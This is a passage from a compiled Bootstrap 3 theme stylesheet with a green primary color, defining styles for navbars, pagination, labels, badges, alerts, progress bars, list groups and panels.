  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #c4ffbf;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #c4ffbf;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0px;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
  padding: 0 5px;
  color: #999999;
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0px;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  line-height: 1.42857143;
  text-decoration: none;
  color: #10bf00;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  margin-left: -1px;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  color: #0a7300;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #10bf00;
  border-color: #10bf00;
  cursor: default;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  background-color: #ffffff;
  border-color: #dddddd;
  cursor: not-allowed;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  list-style: none;
  text-align: center;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  background-color: #ffffff;
  cursor: not-allowed;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #10bf00;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #0c8c00;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  color: #ffffff;
  line-height: 1;
  vertical-align: baseline;
  white-space: nowrap;
  text-align: center;
  background-color: #999999;
  border-radius: 0px;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #10bf00;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding: 40px 20px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  border-radius: 0px;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding: 64px 0;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #10bf00;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0px;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  background-color: #fcf8e3;
  border-color: #faebcc;
  color: #c09853;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  overflow: hidden;
  height: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #10bf00;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  zoom: 1;
  overflow: hidden;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  margin-bottom: 20px;
  padding-left: 0;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0px;
  border-bottom-left-radius: 0px;
}
a.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
  text-decoration: none;
  color: #555555;
  background-color: #f5f5f5;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  background-color: #eeeeee;
  color: #999999;
  cursor: not-allowed;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #10bf00;
  border-color: #10bf00;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #96ff8c;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
a.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
a.list-group-item-success.active:hover,
a.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
a.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
a.list-group-item-info.active:hover,
a.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
a.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
a.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0px;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1px;
  border-top-right-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1px;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1px;
  border-bottom-right-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1px;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  border: 0;
  margin-bottom: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0px;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #10bf00;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #10bf00;
  border-color: #10bf00;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #10bf00;
}
.panel-primary > .panel-heading .badge {
  color: #10bf00;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #10bf00;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
